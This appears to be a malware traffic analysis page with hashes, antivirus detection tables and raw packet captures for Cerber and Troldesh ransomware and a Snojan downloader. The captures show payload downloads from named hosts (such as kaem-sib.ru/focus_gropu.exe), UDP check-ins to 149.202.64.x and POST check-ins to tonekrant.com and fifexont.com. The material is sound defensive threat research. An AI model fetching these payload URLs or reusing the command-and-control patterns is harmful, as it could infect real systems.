UnInstall.exe Cerber Ransomware Malware Traffic Analysis PCAP file Download 149.202.64.0.6892: UDP, length 27

 

SHA256: 1f4acebd331ff6fe617afe32da66b7577056a903f077bd79c4bdc534bb044d94
File name: UnInstall.exe
Detection ratio: 19 / 59
Analysis date: 2017-03-25 02:27:04 UTC ( 0 minutes ago )
AegisLab Ransom.Hpcerber.Sm51!c 20170325
Avast Win32:Malware-gen 20170325
CrowdStrike Falcon (ML) malicious_confidence_100% (W) 20170130
DrWeb Trojan.Inject2.51570 20170325
Endgame malicious (high confidence) 20170317
ESET-NOD32 Win32/Filecoder.Cerber.I 20170325
Fortinet W32/Kryptik.FQBM!tr 20170325
Invincea virus.win32.virut.bn 20170203
Kaspersky UDS:DangerousObject.Multi.Generic 20170325
McAfee Ransomware-FLJJ!DF9E8845DE72 20170325
McAfee-GW-Edition BehavesLike.Win32.Conficker.gh 20170325
Palo Alto Networks (Known Signatures) generic.ml 20170325
Qihoo-360 HEUR/QVM02.0.0487.Malware.Gen 20170325
Rising Malware.Generic.1!tfe (cloud:nN3uADiketB) 20170325
SentinelOne (Static ML) static engine – malicious 20170315
Sophos Mal/Cerber-X 20170325

2017-03-24 21:39:57.755565 IP 192.168.1.102.53049 > 82.165.129.119.80: Flags [P.], seq 0:290, ack 1, win 256, length 290: HTTP: GET /UnInstall.exe HTTP/1.1
E..J/.@…3….fR..w.9.Pa.d.B\doP…aR..GET /UnInstall.exe HTTP/1.1
Accept: application/x-shockwave-flash, image/gif, image/jpeg, image/pjpeg, */*
Accept-Language: en-us
User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0)
Accept-Encoding: gzip, deflate
Host: 82.165.129.119
Connection: Keep-Alive

2017-03-24 21:40:08.813612 IP 192.168.1.102.64829 > 149.202.64.0.6892: UDP, length 27
E..7…….)…f..@..=…#.sa8022f1aa8d50098750100000c1
2017-03-24 21:40:08.813678 IP 192.168.1.102.64829 > 149.202.64.1.6892: UDP, length 27
E..7s…..0….f..@..=…#.ra8022f1aa8d50098750100000c1
2017-03-24 21:40:08.813681 IP 192.168.1.102.64829 > 149.202.64.2.6892: UDP, length 27
E..7?j….dq…f..@..=…#.qa8022f1aa8d50098750100000c1
2017-03-24 21:40:08.813756 IP 192.168.1.102.64829 > 149.202.64.3.6892: UDP, length 27
E..7a…..B….f..@..=…#.pa8022f1aa8d50098750100000c1
2017-03-24 21:40:08.813758 IP 192.168.1.102.64829 > 149.202.64.4.6892: UDP, length 27
E..7V…..M….f..@..=…#.oa8022f1aa8d50098750100000c1
2017-03-24 21:40:08.813823 IP 192.168.1.102.64829 > 149.202.64.5.6892: UDP, length 27
E..7;…..h1…f..@..=…#.na8022f1aa8d50098750100000c1
2017-03-24 21:40:08.813877 IP 192.168.1.102.64829 > 149.202.64.6.6892: UDP, length 27
E..7f…..=….f..@..=…#.ma8022f1aa8d50098750100000c1
2017-03-24 21:40:08.813879 IP 192.168.1.102.64829 > 149.202.64.7.6892: UDP, length 27
E..7…….Q…f..@..=…#.la8022f1aa8d50098750100000c1
2017-03-24 21:40:08.813955 IP 192.168.1.102.64829 > 149.202.64.8.6892: UDP, length 27
E..7h…..:….f..@..=…#.ka8022f1aa8d50098750100000c1
2017-03-24 21:40:08.813957 IP 192.168.1.102.64829 > 149.202.64.9.6892: UDP, length 27
E..7.d…..p…f..@     .=…#.ja8022f1aa8d50098750100000c1
2017-03-24 21:40:08.814033 IP 192.168.1.102.64829 > 149.202.64.10.6892: UDP, length 27
E..7\I….G….f..@
.=…#.ia8022f1aa8d50098750100000c1
2017-03-24 21:40:08.814035 IP 192.168.1.102.64829 > 149.202.64.11.6892: UDP, length 27
E..75…..n@…f..@..=…#.ha8022f1aa8d50098750100000c1
2017-03-24 21:40:08.814110 IP 192.168.1.102.64829 > 149.202.64.12.6892: UDP, length 27
E..7AY….bx…f..@..=…#.ga8022f1aa8d50098750100000c1
2017-03-24 21:40:08.814113 IP 192.168.1.102.64829 > 149.202.64.13.6892: UDP, length 27
E..7`…..C….f..@..=…#.fa8022f1aa8d50098750100000c1
2017-03-24 21:40:08.814197 IP 192.168.1.102.64829 > 149.202.64.14.6892: UDP, length 27
E..7…….0…f..@..=…#.ea8022f1aa8d50098750100000c1
2017-03-24 21:40:08.814199 IP 192.168.1.102.64829 > 149.202.64.15.6892: UDP, length 27
E..7m8….6….f..@..=…#.da8022f1aa8d50098750100000c1
2017-03-24 21:40:08.814276 IP 192.168.1.102.64829 > 149.202.64.16.6892: UDP, length 27
E..7Bo….a^…f..@..=…#.ca8022f1aa8d50098750100000c1
2017-03-24 21:40:08.814278 IP 192.168.1.102.64829 > 149.202.64.17.6892: UDP, length 27
E..7\…..F….f..@..=…#.ba8022f1aa8d50098750100000c1
2017-03-24 21:40:08.814355 IP 192.168.1.102.64829 > 149.202.64.18.6892: UDP, length 27
E..7…….6…f..@..=…#.aa8022f1aa8d50098750100000c1
2017-03-24 21:40:08.814357 IP 192.168.1.102.64829 > 149.202.64.19.6892: UDP, length 27
E..7pN….3|…f..@..=…#.`a8022f1aa8d50098750100000c1
2017-03-24 21:40:08.814432 IP 192.168.1.102.64829 > 149.202.64.20.6892: UDP, length 27
E..7l…..7….f..@..=…#._a8022f1aa8d50098750100000c1

CERBER Ransomware lobsterscrewallt.top GET /search.php Malware PCAP File Download Traffic Analysis

SHA256:     fa33b75a4e095d6865420c7bd27d7233d7a0653896eb59611f3166466bbfb64a
File name:     1
Detection ratio:     4 / 61
Analysis date:     2017-03-24 23:53:30 UTC ( 1 minute ago )

Antivirus     Result     Update
CrowdStrike Falcon (ML)     malicious_confidence_100% (D)     20170130
Endgame     malicious (moderate confidence)     20170317
Invincea     worm.win32.kasidet.f     20170203
McAfee-GW-Edition     BehavesLike.Win32.ObfusRansom.dc     20170324

 

 

2017-03-24 21:59:48.601287 IP 192.168.1.102.53097 > 54.145.185.110.80: Flags [P.], seq 0:293, ack 1, win 256, length 293: HTTP: GET /search.php HTTP/1.1
E..M{*@….r…f6..n.i.P+….Y..P…….GET /search.php HTTP/1.1
Accept: application/x-shockwave-flash, image/gif, image/jpeg, image/pjpeg, */*
Accept-Language: en-us
User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0)
Accept-Encoding: gzip, deflate
Host: lobsterscrewallt.top
Connection: Keep-Alive

2017-03-24 22:00:43.944049 IP 192.168.1.102.58976 > 149.202.64.0.6892: UDP, length 27
E..7………..f..@..`…#..2021bcf6b65b0091c5010000097
2017-03-24 22:00:43.944056 IP 192.168.1.102.58976 > 149.202.64.1.6892: UDP, length 27
E..7wM….,….f..@..`…#..2021bcf6b65b0091c5010000097
2017-03-24 22:00:43.944104 IP 192.168.1.102.58976 > 149.202.64.2.6892: UDP, length 27
E..7C…..`1…f..@..`…#..2021bcf6b65b0091c5010000097
2017-03-24 22:00:43.944170 IP 192.168.1.102.58976 > 149.202.64.3.6892: UDP, length 27
E..7f…..=….f..@..`…#..2021bcf6b65b0091c5010000097
2017-03-24 22:00:43.944174 IP 192.168.1.102.58976 > 149.202.64.4.6892: UDP, length 27
E..7Z^….I{…f..@..`…#..2021bcf6b65b0091c5010000097
2017-03-24 22:00:43.944247 IP 192.168.1.102.58976 > 149.202.64.5.6892: UDP, length 27
E..7?…..c….f..@..`…#..2021bcf6b65b0091c5010000097
2017-03-24 22:00:43.944250 IP 192.168.1.102.58976 > 149.202.64.6.6892: UDP, length 27
E..7k…..8….f..@..`…#..2021bcf6b65b0091c5010000097
2017-03-24 22:00:43.944321 IP 192.168.1.102.58976 > 149.202.64.7.6892: UDP, length 27
E..7………..f..@..`…#..2021bcf6b65b0091c5010000097
2017-03-24 22:00:43.944372 IP 192.168.1.102.58976 > 149.202.64.8.6892: UDP, length 27
E..7m+….6….f..@..`…#..2021bcf6b65b0091c5010000097
2017-03-24 22:00:43.944376 IP 192.168.1.102.58976 > 149.202.64.9.6892: UDP, length 27
E..7
……0…f..@  .`…#..2021bcf6b65b0091c5010000097
2017-03-24 22:00:43.944445 IP 192.168.1.102.58976 > 149.202.64.10.6892: UDP, length 27
E..7`…..CJ…f..@
.`…#..2021bcf6b65b0091c5010000097
2017-03-24 22:00:43.944448 IP 192.168.1.102.58976 > 149.202.64.11.6892: UDP, length 27
E..79…..j….f..@..`…#..2021bcf6b65b0091c5010000097
2017-03-24 22:00:43.944520 IP 192.168.1.102.58976 > 149.202.64.12.6892: UDP, length 27
E..7E…..^8…f..@..`…#..2021bcf6b65b0091c5010000097
2017-03-24 22:00:43.944524 IP 192.168.1.102.58976 > 149.202.64.13.6892: UDP, length 27
E..7dB….?….f..@..`…#..2021bcf6b65b0091c5010000097
2017-03-24 22:00:43.944595 IP 192.168.1.102.58976 > 149.202.64.14.6892: UDP, length 27
E..7………..f..@..`…#.~2021bcf6b65b0091c5010000097
2017-03-24 22:00:43.944598 IP 192.168.1.102.58976 > 149.202.64.15.6892: UDP, length 27
E..7qx….2V…f..@..`…#.}2021bcf6b65b0091c5010000097
2017-03-24 22:00:43.944669 IP 192.168.1.102.58976 > 149.202.64.16.6892: UDP, length 27
E..7F…..]….f..@..`…#.|2021bcf6b65b0091c5010000097
2017-03-24 22:00:43.944672 IP 192.168.1.102.58976 > 149.202.64.17.6892: UDP, length 27
E..7a8….B….f..@..`…#.{2021bcf6b65b0091c5010000097
2017-03-24 22:00:43.944743 IP 192.168.1.102.58976 > 149.202.64.18.6892: UDP, length 27
E..7………..f..@..`…#.z2021bcf6b65b0091c5010000097
2017-03-24 22:00:43.944746 IP 192.168.1.102.58976 > 149.202.64.19.6892: UDP, length 27
E..7t…../<…f..@..`…#.y2021bcf6b65b0091c5010000097
2017-03-24 22:00:43.944804 IP 192.168.1.102.58976 > 149.202.64.20.6892: UDP, length 27
E..7pE….3….f..@..`…#.x2021bcf6b65b0091c5010000097
2017-03-24 22:00:43.944855 IP 192.168.1.102.58976 > 149.202.64.21.6892: UDP, length 27
E..7    ……*…f..@..`…#.w2021bcf6b65b0091c5010000097

RANSOMWARE TOR kaem-sib.ru PCAP File Download Traffic Sample Malware Botnet

SHA256:     1d75dc020643b59c4b7745887e00730d2fcf1a129fc21d657402341812429891
File name:     focus_gropu.exe
Detection ratio:     51 / 61
Analysis date:     2017-03-25 00:20:49 UTC ( 0 minutes ago )

McAfee-GW-Edition     BehavesLike.Win32.Trojan.dc     20170324
Microsoft     Ransom:Win32/Troldesh.A     20170324
eScan     Trojan.GenericKD.4586233     20170325
NANO-Antivirus     Trojan.Win32.VB.emkvtl     20170324
Palo Alto Networks (Known Signatures)     generic.ml     20170325
Panda     Trj/Genetic.gen     20170324
Qihoo-360     Win32/Trojan.Dropper.489     20170325
Rising     Malware.Generic.5!tfe (cloud:4TqJyxfiS0C)     20170325
SentinelOne (Static ML)     static engine – malicious     20170315
Sophos     Troj/Emogen-BV     20170324
Symantec     Ransom.Kovter     20170324
Tencent     Win32.Trojan.Vb.Wpjn     20170325
TrendMicro     Ransom_CRYPSEN.VC     20170324
TrendMicro-HouseCall     Ransom_CRYPSEN.VC     20170324
VBA32     TScope.Trojan.VB     20170324
VIPRE     Trojan.Win32.Generic!BT     20170325
Webroot     Malicious     20170325
Yandex     Trojan.VB!0amP9/ctkPI     20170323
ZoneAlarm by Check Point     Trojan.Win32.VB.dkbu     20170324

 

 

2017-03-24 22:04:51.615705 IP 192.168.1.102.53116 > 176.57.210.35.80: Flags [P.], seq 2149610031:2149610320, ack 1808991785, win 256, length 289: HTTP: GET /focus_gropu.exe HTTP/1.1
E..Ic.@…Q….f.9.#.|.P. r/k..)P…….GET /focus_gropu.exe HTTP/1.1
Accept: application/x-shockwave-flash, image/gif, image/jpeg, image/pjpeg, */*
Accept-Language: en-us
User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0)
Accept-Encoding: gzip, deflate
Host: kaem-sib.ru
Connection: Keep-Alive

2017-03-24 22:06:01.316270 IP 192.168.1.102.53118 > 208.83.223.34.80: Flags [P.], seq 1865667761:1865667961, ack 2691578719, win 256, length 200: HTTP
E….G@….<…f.S.”.~.Po3…n;_P…f…………….{C}f.Tdd…^T..&i.I.Sj…%.i.E….+./.
.       …..3.9./.5……………www.rdurehjc3eat.com………
.4.2………….       .

 

2017-03-24 22:06:04.845631 IP 192.168.1.102.53121 > 195.154.183.159.443: Flags [P.], seq 238393047:238393259, ack 2918993764, win 260, length 212
E…IY@…sZ…f………5….OdP…a…………..h..
..k……/….Nx…w.nw.O..c….+./.
.       …..3.9./.5………%.#.. www.sjfywd4kadz7fm2wyfi5t4ne.com………
.4.2………….       .
……………………………..#……………………………
2017-03-24 22:06:04.852433 IP 192.168.1.102.53123 > 89.163.224.25.9001: Flags [P.], seq 3812081279:3812081489, ack 2996902744, win 256, length 210
E…B$@……..fY…..#).7…..XP….c…………..*d.5.e…..$.#d.Z.6..f….K..=/….+./.
.       …..3.9./.5………#.!…www.iprzadmkt4twlqiq2zkf6c.com………
.4.2………….       .
……………………………..#……………………………
2017-03-24 22:06:04.892508 IP 192.168.1.102.53122 > 85.10.201.47.9001: Flags [P.], seq 4258093770:4258093963, ack 4228567313, win 256, length 193
E…:Z@….l…fU
./..#)..Z..
..P…………………)……….?..^…./\…=2v<i….+./.
.       …..3.9./.5…..y………www.x27nr.com………
.4.2………….       .
……………………………..#……………………………
2017-03-24 22:06:04.979745 IP 192.168.1.102.53121 > 195.154.183.159.443: Flags [P.], seq 212:338, ack 754, win 258, length 126
E…IZ@…s….f………5….RUP…#…….F…BA..Q.:……..9…..}WNz…Y.M..6<.|.+….R…?…..W.@..6…7′.h………..(…..~…6…..Imv..=|.gN.u…^……h..
2017-03-24 22:06:04.983145 IP 192.168.1.102.53123 > 89.163.224.25.9001: Flags [P.], seq 210:336, ack 753, win 253, length 126
E…B%@….a…fY…..#).7.Q…HP….Z……F…BA…..`…..8I.j       .7……….m..F.#./.v.u.!…X<10…..!Zx..7-.1>Y……….(.b..~…m….ZW-…JG..R)…|..o.GE….8
2017-03-24 22:06:05.011469 IP 192.168.1.102.53122 > 85.10.201.47.9001: Flags [P.], seq 193:319, ack 758, win 253, length 126
E…:[@……..fU
./..#)..[..
..P…H
……F…BA..n./w2…”…..g….F.&@……4l..5K………pDVZq…….U….GL……….(K.8.(.T.<-.w.Cb….T…|.._..n….._….
2017-03-24 22:06:05.088478 IP 192.168.1.102.53121 > 195.154.183.159.443: Flags [P.], seq 338:376, ack 805, win 257, length 38
E..NI[@…t….f………5.)..R.P………..!…..~…..Z…,…..W..!\..R….
2017-03-24 22:06:05.097271 IP 192.168.1.102.53123 > 89.163.224.25.9001: Flags [P.], seq 336:374, ack 804, win 253, length 38
E..NB&@……..fY…..#).7…..{P….’……!.b..~……        ..z>……4m……..a
2017-03-24 22:06:05.124872 IP 192.168.1.102.53122 > 85.10.201.47.9001: Flags [P.], seq 319:357, ack 809, win 253, length 38
E..N:\@……..fU
./..#)..\       .
.9P………..!K.8.(.T..I…..-.{3;Dr.NMq..e.p<.

CERBER Ransomware voperforseanx.top 2.gif Malware Analysis PCAP file Download Traffic Sample

2017-03-24 21:33:08.433085 IP 192.168.1.102.52862 > 47.90.205.113.80: Flags [P.], seq 0:296, ack 1, win 256, length 296: HTTP: GET /user.php?f=2.gif HTTP/1.1
E..P.F@…+….f/Z.q.~.P…….gP…7K..GET /user.php?f=2.gif HTTP/1.1
Accept: application/x-shockwave-flash, image/gif, image/jpeg, image/pjpeg, */*
Accept-Language: en-us
User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0)
Accept-Encoding: gzip, deflate
Host: voperforseanx.top
Connection: Keep-Alive

 

2017-03-24 21:34:18.965418 IP 192.168.1.102.52879 > 204.79.197.213.443: Flags [.], ack 84798, win 32768, length 0
E..(2.@…s….f.O……1.B…b^P…R………
2017-03-24 21:34:18.965823 IP 192.168.1.102.52879 > 204.79.197.213.443: Flags [.], ack 86258, win 32768, length 0
E..(2.@…s….f.O……1.B…h.P…M………
2017-03-24 21:34:18.966006 IP 192.168.1.102.52879 > 204.79.197.213.443: Flags [.], ack 87718, win 32768, length 0
E..(2.@…s….f.O……1.B…m.P…GM……..
2017-03-24 21:34:18.969465 IP 192.168.1.102.52879 > 204.79.197.213.443: Flags [.], ack 89178, win 32768, length 0
E..(2.@…s….f.O……1.B…szP…A………
2017-03-24 21:34:18.969858 IP 192.168.1.102.52879 > 204.79.197.213.443: Flags [.], ack 90638, win 32768, length 0
E..(2.@…s….f.O……1.B…y.P…;………
2017-03-24 21:34:18.969871 IP 192.168.1.102.52879 > 204.79.197.213.443: Flags [.], ack 91215, win 32695, length 0
E..(2.@…s….f.O……1.B…{oP…9………
2017-03-24 21:34:31.818161 IP 192.168.1.102.56966 > 149.202.64.0.6892: UDP, length 27
E..7.t…..i…f..@……#.(e008b81bf47e0446950100000f9
2017-03-24 21:34:31.818169 IP 192.168.1.102.56966 > 149.202.64.1.6892: UDP, length 27
E..7n…..5….f..@……#.’e008b81bf47e0446950100000f9
2017-03-24 21:34:31.818170 IP 192.168.1.102.56966 > 149.202.64.2.6892: UDP, length 27
E..7;*….h….f..@……#.&e008b81bf47e0446950100000f9
2017-03-24 21:34:31.818260 IP 192.168.1.102.56966 > 149.202.64.3.6892: UDP, length 27
E..7]…..FG…f..@……#.%e008b81bf47e0446950100000f9
2017-03-24 21:34:31.818268 IP 192.168.1.102.56966 > 149.202.64.4.6892: UDP, length 27
E..7Q…..Q….f..@……#.$e008b81bf47e0446950100000f9
2017-03-24 21:34:31.818300 IP 192.168.1.102.56966 > 149.202.64.5.6892: UDP, length 27
E..77g….lq…f..@……#.#e008b81bf47e0446950100000f9
2017-03-24 21:34:31.818312 IP 192.168.1.102.56966 > 149.202.64.6.6892: UDP, length 27
E..7b…..AK…f..@……#.”e008b81bf47e0446950100000f9
2017-03-24 21:34:31.818402 IP 192.168.1.102.56966 > 149.202.64.7.6892: UDP, length 27
E..7.E………f..@……#.!e008b81bf47e0446950100000f9
2017-03-24 21:34:31.818405 IP 192.168.1.102.56966 > 149.202.64.8.6892: UDP, length 27
E..7d…..?*…f..@……#. e008b81bf47e0446950100000f9
2017-03-24 21:34:31.818468 IP 192.168.1.102.56966 > 149.202.64.9.6892: UDP, length 27
E..7.$………f..@     …..#..e008b81bf47e0446950100000f9
2017-03-24 21:34:31.818471 IP 192.168.1.102.56966 > 149.202.64.10.6892: UDP, length 27
E..7X   ….K….f..@
…..#..e008b81bf47e0446950100000f9
2017-03-24 21:34:31.818521 IP 192.168.1.102.56966 > 149.202.64.11.6892: UDP, length 27
E..71R….r….f..@……#..e008b81bf47e0446950100000f9
2017-03-24 21:34:31.818593 IP 192.168.1.102.56966 > 149.202.64.12.6892: UDP, length 27
E..7=…..f….f..@……#..e008b81bf47e0446950100000f9
2017-03-24 21:34:31.818621 IP 192.168.1.102.56966 > 149.202.64.13.6892: UDP, length 27
E..7[…..H….f..@……#..e008b81bf47e0446950100000f9
2017-03-24 21:34:31.818623 IP 192.168.1.102.56966 > 149.202.64.14.6892: UDP, length 27
E..7._…..p…f..@……#..e008b81bf47e0446950100000f9
2017-03-24 21:34:31.818705 IP 192.168.1.102.56966 > 149.202.64.15.6892: UDP, length 27
E..7h…..:….f..@……#..e008b81bf47e0446950100000f9
2017-03-24 21:34:31.818706 IP 192.168.1.102.56966 > 149.202.64.16.6892: UDP, length 27
E..7>/….e….f..@……#..e008b81bf47e0446950100000f9
2017-03-24 21:34:31.818786 IP 192.168.1.102.56966 > 149.202.64.17.6892: UDP, length 27
E..7X…..K….f..@……#..e008b81bf47e0446950100000f9

Snojan Dynamer Trojan Downloader Malware fifexont.com tonekrant.com FULL PCAP File Download Traffic Analysis

SHA256: a66c3e211004c7d403f633a0ced7327f5b2b102f47be4226d24edcb7ebd21562
File name: front.exe
Detection ratio: 49 / 58
Analysis date: 2017-02-20 05:26:08 UTC ( 0 minutes ago )
Antivirus Result Update
ALYac Trojan.GenericKD.4294253 20170220
AVG Agent5.AXHG 20170220
AVware Trojan.Win32.Generic!BT 20170220
Ad-Aware Trojan.GenericKD.4294253 20170220
AegisLab Uds.Dangerousobject.Multi!c 20170220
AhnLab-V3 Trojan/Win32.Snojan.C1770480 20170219
Arcabit Trojan.Generic.D41866D 20170220
Avast Win32:Malware-gen 20170220
Avira (no cloud) TR/Crypt.ZPACK.wcpog 20170219
Baidu Win32.Trojan.WisdomEyes.16070401.9500.9999 20170217
BitDefender Trojan.GenericKD.4294253 20170220
Bkav HW32.Packed.3570 20170218
CAT-QuickHeal Trojan.Dynamer 20170218
ClamAV Win.Trojan.Generic-5747581-0 20170220
Comodo UnclassifiedMalware 20170220
CrowdStrike Falcon (ML) malicious_confidence_100% (W) 20170130

2017-02-18 07:29:58.854612 IP 192.168.1.102.55863 > 46.30.213.95.80: Flags [P.], seq 0:285, ack 1, win 64240, length 285: HTTP: GET /front.exe HTTP/1.1
E..E}.@….f…f…_.7.P.^$UN..rP…….GET /front.exe HTTP/1.1
Accept: application/x-shockwave-flash, image/gif, image/jpeg, image/pjpeg, */*
Accept-Language: en-us
User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0)
Accept-Encoding: gzip, deflate
Host: galflview.com
Connection: Keep-Alive

2017-02-18 07:30:39.853148 IP 192.168.1.102.58750 > 75.75.75.75.53: 64438+ A? mutinenag.com. (31)
E..;(……)…fKKKK.~.5.’…………..        mutinenag.com…..
2017-02-18 07:30:39.895762 IP 192.168.1.102.49577 > 75.75.75.75.53: 38977+ A? mutinenag.com.hsd1.md.comcast.net. (51)
E..O(……….fKKKK…5.;[..A……….        mutinenag.com.hsd1.md.comcast.net…..
2017-02-18 07:30:39.926948 IP 192.168.1.102.49577 > 75.75.76.76.53: 38977+ A? mutinenag.com.hsd1.md.comcast.net. (51)
E..OFa………fKKLL…5.;Y..A……….        mutinenag.com.hsd1.md.comcast.net…..
2017-02-18 07:30:44.725455 IP 192.168.1.102.63306 > 157.56.31.43.3544: UDP, length 61
E..Y    Y………f.8.+.J…E……..RH…’.`…..:……………………………..}8….
2017-02-18 07:30:58.514427 IP 192.168.1.102.50385 > 75.75.75.75.53: 22454+ A? v10.vortex-win.data.microsoft.com. (51)
E..O(……….fKKKK…5.;..W…………v10
vortex-win.data microsoft.com…..
2017-02-18 07:31:01.723097 IP 192.168.1.102.50386 > 75.75.75.75.53: 16459+ A? mumeraxo.com. (30)
E..:(……&…fKKKK…5.&.o@K………..mumeraxo.com…..
2017-02-18 07:31:01.794496 IP 192.168.1.102.58993 > 75.75.75.75.53: 13753+ A? mumeraxo.com.hsd1.md.comcast.net. (50)
E..N(……….fKKKK.q.5.:Im5…………mumeraxo.com.hsd1.md.comcast.net…..
2017-02-18 07:31:01.825945 IP 192.168.1.102.58993 > 75.75.76.76.53: 13753+ A? mumeraxo.com.hsd1.md.comcast.net. (50)
E..NFe………fKKLL.q.5.:Hl5…………mumeraxo.com.hsd1.md.comcast.net…..
2017-02-18 07:31:12.547120 IP 192.168.1.102.63306 > 157.56.31.43.3544: UDP, length 61
E..Y    Z………f.8.+.J…E……..RH…’.`…..:……………………………..}8….
2017-02-18 07:31:23.630061 IP 192.168.1.102.58994 > 75.75.75.75.53: 27009+ A? tonekrant.com. (31)
E..;(……”…fKKKK.r.5.’!.i………..        tonekrant.com…..
2017-02-18 07:31:24.641948 IP 192.168.1.102.58995 > 75.75.75.75.53: 27009+ A? tonekrant.com. (31)
E..;(……!…fKKKK.s.5.’!.i………..        tonekrant.com…..
2017-02-18 07:31:25.627370 IP 192.168.1.102.58996 > 75.75.75.75.53: 27009+ A? tonekrant.com. (31)
E..;(…… …fKKKK.t.5.’!.i………..        tonekrant.com…..
2017-02-18 07:31:25.629833 IP 192.168.1.102.58994 > 75.75.76.76.53: 27009+ A? tonekrant.com. (31)
E..;Fi………fKKLL.r.5.’ .i………..        tonekrant.com…..
2017-02-18 07:31:26.641969 IP 192.168.1.102.58995 > 75.75.76.76.53: 27009+ A? tonekrant.com. (31)
E..;Fj………fKKLL.s.5.’ .i………..        tonekrant.com…..
2017-02-18 07:31:27.627190 IP 192.168.1.102.58996 > 75.75.76.76.53: 27009+ A? tonekrant.com. (31)
E..;Fk………fKKLL.t.5.’ .i………..        tonekrant.com…..
2017-02-18 07:31:27.627605 IP 192.168.1.102.58997 > 75.75.75.75.53: 27009+ A? tonekrant.com. (31)
E..;(……….fKKKK.u.5.’!.i………..        tonekrant.com…..
2017-02-18 07:31:27.630024 IP 192.168.1.102.58994 > 75.75.75.75.53: 27009+ A? tonekrant.com. (31)
E..;(……….fKKKK.r.5.’!.i………..        tonekrant.com…..
2017-02-18 07:31:28.032961 IP 192.168.1.102.55867 > 93.179.121.47.80: Flags [S], seq 3536318263, win 8192, options

2017-02-18 07:31:28.202872 IP 192.168.1.102.55867 > 93.179.121.47.80: Flags [P.], seq 0:428, ack 1, win 256, length 428: HTTP: POST /js.php HTTP/1.1
E…m[@……..f].y/.;.P…8..N.P…….POST /js.php HTTP/1.1
Host: tonekrant.com
Accept: text/html, */*
Content-Type: application/x-www-form-urlencoded
Content-Length: 4
Connection: close

PKEY……………………………………………………………………………………………………………………………………………………………………………………………………………………………………………
2017-02-18 07:31:28.353750 IP 192.168.1.102.55867 > 93.179.121.47.80: Flags [.], ack 2, win 256, length 0
E..(m\@……..f].y/.;.P……N.P…\………
2017-02-18 07:31:28.354903 IP 192.168.1.102.55867 > 93.179.121.47.80: Flags [F.], seq 428, ack 2, win 256, length 0
E..(m]@……..f].y/.;.P……N.P…\………
2017-02-18 07:31:28.642457 IP 192.168.1.102.58995 > 75.75.75.75.53: 27009+ A? tonekrant.com. (31)
E..;(……….fKKKK.s.5.’!.i………..        tonekrant.com…..
2017-02-18 07:31:29.627324 IP 192.168.1.102.58996 > 75.75.75.75.53: 27009+ A? tonekrant.com. (31)
E..;(……….fKKKK.t.5.’!.i………..        tonekrant.com…..
2017-02-18 07:31:29.630282 IP 192.168.1.102.58994 > 75.75.76.76.53: 27009+ A? tonekrant.com. (31)
E..;Fp………fKKLL.r.5.’ .i………..        tonekrant.com…..
2017-02-18 07:31:30.642485 IP 192.168.1.102.58995 > 75.75.76.76.53: 27009+ A? tonekrant.com. (31)
E..;Fq………fKKLL.s.5.’ .i………..        tonekrant.com…..
2017-02-18 07:31:37.200322 IP 192.168.1.102.63306 > 157.56.31.43.3544: UDP, length 61
E..Y    [………f.8.+.J…E……..RH…’.`…..:……………………………..}8….
2017-02-18 07:31:43.367646 IP 192.168.1.102.58998 > 75.75.75.75.53: 46732+ A? fifexont.com. (30)
E..:(……….fKKKK.v.5.&}…………..fifexont.com…..
2017-02-18 07:31:44.361927 IP 192.168.1.102.58999 > 75.75.75.75.53: 46732+ A? fifexont.com. (30)
E..:(……….fKKKK.w.5.&}…………..fifexont.com…..
2017-02-18 07:31:45.361997 IP 192.168.1.102.59000 > 75.75.75.75.53: 46732+ A? fifexont.com. (30)
E..:(……….fKKKK.x.5.&}…………..fifexont.com…..
2017-02-18 07:31:45.363970 IP 192.168.1.102.58998 > 75.75.76.76.53: 46732+ A? fifexont.com. (30)
E..:Fu………fKKLL.v.5.&|…………..fifexont.com…..
2017-02-18 07:31:46.361710 IP 192.168.1.102.58999 > 75.75.76.76.53: 46732+ A? fifexont.com. (30)
E..:Fv………fKKLL.w.5.&|…………..fifexont.com…..

2017-02-18 07:31:46.827372 IP 192.168.1.102.56024 > 93.179.121.170.80: Flags [P.], seq 0:427, ack 1, win 256, length 427: HTTP: POST /js.php HTTP/1.1
E…D.@….1…f].y….P`?Y…..P….’..POST /js.php HTTP/1.1
Host: fifexont.com
Accept: text/html, */*
Content-Type: application/x-www-form-urlencoded
Content-Length: 4
Connection: close

PKEY……………………………………………………………………………………………………………………………………………………………………………………………………………………………………………
2017-02-18 07:31:46.976014 IP 192.168.1.102.56024 > 93.179.121.170.80: Flags [.], ack 2, win 256, length 0
E..(D.@……..f].y….P`?[…..P………….
2017-02-18 07:31:46.976419 IP 192.168.1.102.56024 > 93.179.121.170.80: Flags [F.], seq 427, ack 2, win 256, length 0
E..(D.@……..f].y….P`?[…..P………….
2017-02-18 07:31:47.361693 IP 192.168.1.102.59000 > 75.75.76.76.53: 46732+ A? fifexont.com. (30)
E..:Fw………fKKLL.x.5.&|…………..fifexont.com…..
2017-02-18 07:31:47.364159 IP 192.168.1.102.58998 > 75.75.75.75.53: 46732+ A? fifexont.com. (30)
E..:(……….fKKKK.v.5.&}…………..fifexont.com…..

2017-02-18 07:35:43.355047 IP 192.168.1.102.49579 > 75.75.75.75.53: 44680+ A? tele.trafficmanager.net. (41)
E..E)……….fKKKK…5.13…………..tele.trafficmanager.net…..
2017-02-18 07:35:43.373699 IP 192.168.1.102.56039 > 191.239.50.77.80: Flags [S], seq 3222178950, win 8192, options [mss 1460,nop,wscale 8,nop,nop,sackOK], length 0
E..45A@….8…f..2M…P………. .r……………
2017-02-18 07:35:43.402299 IP 192.168.1.102.56038 > 65.55.252.190.443: Flags [.], ack 4237, win 253, length 0
E..(.W@….t…fA7…….._.c./.P………….
2017-02-18 07:35:43.457448 IP 192.168.1.102.56039 > 191.239.50.77.80: Flags [.], ack 3335379774, win 258, length 0
E..(5B@….C…f..2M…P…….>P…0………
2017-02-18 07:35:43.457557 IP 192.168.1.102.56039 > 191.239.50.77.80: Flags [P.], seq 0:189, ack 1, win 258, length 189: HTTP: GET /%7B5F1B98CE-D333-41DA-B5CE-72EFDD71B6DF%7D HTTP/1.1
E…5C@……..f..2M…P…….>P…….GET /%7B5F1B98CE-D333-41DA-B5CE-72EFDD71B6DF%7D HTTP/1.1
Cache-Control: no-cache
